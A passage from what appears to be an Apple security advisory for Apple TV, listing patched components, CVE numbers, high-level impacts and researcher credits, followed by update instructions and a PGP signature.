Description: The issue was addressed with improved handling of  
protocols.  
CVE-2023-40448: w0wbox

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40432: Mohamed GHANNAM (@_simo36)  
CVE-2023-41174: Mohamed GHANNAM (@_simo36)  
CVE-2023-40409: Ye Zhang (@VAR10CK) of Baidu Security  
CVE-2023-40412: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-41071: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40399: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-40410: Tim Michaud (@TimGMichaud) of Moveworks.ai

AuthKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-32361: Csaba Fitzl (@theevilbit) of Offensive Security

Bluetooth  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker in physical proximity can cause a limited out of  
bounds write  
Description: The issue was addressed with improved checks.  
CVE-2023-35984: zer0k

bootp  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-41065: Adam M., and Noah Roskin-Frazee and Professor Jason Lau  
(ZeroClicks.ai Lab)

CFNetwork  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may fail to enforce App Transport Security  
Description: The issue was addressed with improved handling of  
protocols.  
CVE-2023-38596: Will Brattain at Trail of Bits

CoreAnimation  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40420: 이준성(Junsung Lee) of Cross Republic

Dev Tools  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to gain elevated privileges  
Description: This issue was addressed with improved checks.  
CVE-2023-32396: Mickey Jin (@patch1t)

Game Center  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access contacts  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40395: Csaba Fitzl (@theevilbit) of Offensive Security

GPU Drivers  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40391: Antonio Zekic (@antoniozekic) of Dataflow Security

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory mitigations  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41981: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41984: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access sensitive user data  
Description: A permissions issue was addressed with improved validation.  
CVE-2023-40429: Michael (Biscuit) Thomas and 张师傅(@京东蓝军)

libpcap  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A remote user may cause an unexpected app termination or  
arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2023-40400: Sei K.

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to delete files for which it does not have  
permission  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40454: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access protected user data  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2023-41073: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxslt  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40403: Dohyun Lee (@l33d0hyun) of PK Security

Maps  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40427: Adam M., and Wojciech Regula of SecuRing  
(wojciechregula.blog)

MobileStorageMounter  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A user may be able to elevate privileges  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2023-41068: Mickey Jin (@patch1t)

Photos Storage  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access edited photos saved to a temporary  
directory  
Description: The issue was addressed with improved checks.  
CVE-2023-40456: Kirin (@Pwnrin)  
CVE-2023-40520: Kirin (@Pwnrin)

Pro Res  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41063: Certik Skyfall Team

Sandbox  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to overwrite arbitrary files  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-40452: Yiğit Can YILMAZ (@yilmazcanyigit)

Simulator  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to gain elevated privileges  
Description: The issue was addressed with improved checks.  
CVE-2023-40419: Arsenii Kostromin (0x3c3e)

StorageKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read arbitrary files  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2023-41968: Mickey Jin (@patch1t), James Hutchins

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256551  
CVE-2023-41074: 이준성(Junsung Lee) of Cross Republic and me Li

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 239758  
CVE-2023-35074: Abysslab Dong Jun Kim(@smlijun) and Jong Seong  
Kim(@nevul37)

Additional recognition

Airport  
We would like to acknowledge Adam M., and Noah Roskin-Frazee and  
Professor Jason Lau (ZeroClicks.ai Lab) for their assistance.

AppSandbox  
We would like to acknowledge Kirin (@Pwnrin) for their assistance.

Audio  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Bluetooth  
We would like to acknowledge Jianjun Dai and Guang Gong of 360  
Vulnerability Research Institute for their assistance.

Control Center  
We would like to acknowledge Chester van den Bogaard for their  
assistance.

Kernel  
We would like to acknowledge Bill Marczak of The Citizen Lab at The  
University of Toronto's Munk School and Maddie Stone of Google's Threat  
Analysis Group, 永超 王 for their assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, Ned Williamson of Google Project  
Zero for their assistance.

libxpc  
We would like to acknowledge an anonymous researcher for their  
assistance.

libxslt  
We would like to acknowledge Dohyun Lee (@l33d0hyun) of PK Security,  
OSS-Fuzz, and Ned Williamson of Google Project Zero for their  
assistance.

NSURL  
We would like to acknowledge Zhanpeng Zhao (行之) and 糖豆爸爸(@晴天组织) for  
their assistance.

Photos  
We would like to acknowledge Dawid Pałuska and Kirin (@Pwnrin) for their  
assistance.

Photos Storage  
We would like to acknowledge Wojciech Regula of SecuRing  
(wojciechregula.blog) for their assistance.

Power Services  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Shortcuts  
We would like to acknowledge Alfie Cockell Gwinnett, Christian Basting  
of Bundesamt für Sicherheit in der Informationstechnik, Cristian Dinca  
of "Tudor Vianu" National High School of Computer Science, Romania,  
Giorgos Christodoulidis, Jubaer Alnazi of TRS Group Of Companies,  
KRISHAN KANT DWIVEDI, and Matthew Butler for their assistance.

Software Update  
We would like to acknowledge Omar Siman for their assistance.

Spotlight  
We would like to acknowledge Abhay Kailasia (@abhay_kailasia) of Lakshmi  
Narain College Of Technology Bhopal, and Dawid Pałuska for their  
assistance.

StorageKit  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance. 

WebKit  
We would like to acknowledge Khiem Tran, Narendra Bhati From Suma Soft  
Pvt. Ltd, and an anonymous researcher for their assistance.

Wi-Fi  
We would like to acknowledge Wang Yu of Cyberserval for their  
assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUTSJoACgkQX+5d1TXa  
IvpJvw/+OKqntqggqPkx4TXqH+nCchp4wj3KCjmdtULgoYL2BStw+jXAl9Z/Wnyi  
uhg7YgboJb+jFc2UbYNG/w6Ks4qnh1P/4xwd8KfiGH+u0pblR24DDyNOPA6X+F4c  
CJ2jfagKi7xOM/Djm0mkrkZ1PeiXkx5k4bBLL+I8ckadCZinecn0tZur0gwAzN/y  
e113vKgGJDvVn257inJ063d7d+R4gdDNznMq4Mg5+gtbWoz9OZ6gHiTj+u8jwrlh  
+10ZOBtTHGQ612OptUB2FcyLn439CQhftHlc91L5Am2HsduesB6MBmtiZlfFMaca  
P8Vur6sh/k34roqaWVW2ljvMkqZMJSocTgjzMsVN87itikXT9ua5HbcInnkCMx+A  
8gtOnogY/lsm446Qu0mH0MYAZLSbQ9OYzJor9fax9PV+ysmOGn2SfM2o6DKPXjCE  
74+yFAiv+lo3yrr68SQea/PiDxhMt7+i/Ia7vO5gg1HkqANFc0//KC2pObdGSNu6  
cWJQUcGqOvU/jqnIO9WLXRnSDdXsRGLJ8xXSAYL8M2FdW5Md/tvQ3/p+/6kwXfnq  
cXwM/92G0mx1GFeapToP0NCjUwx4ARCw9d1Y+5keZ4gRaVOJzy/96WKzbc5blVGH  
C5RT/4ty1vpgbCcI8kmDt0WD2nvTnwoNgBaEti/iC3Lzu+M52wA=  
=Zq9i  
-----END PGP SIGNATURE-----

Tag

#auth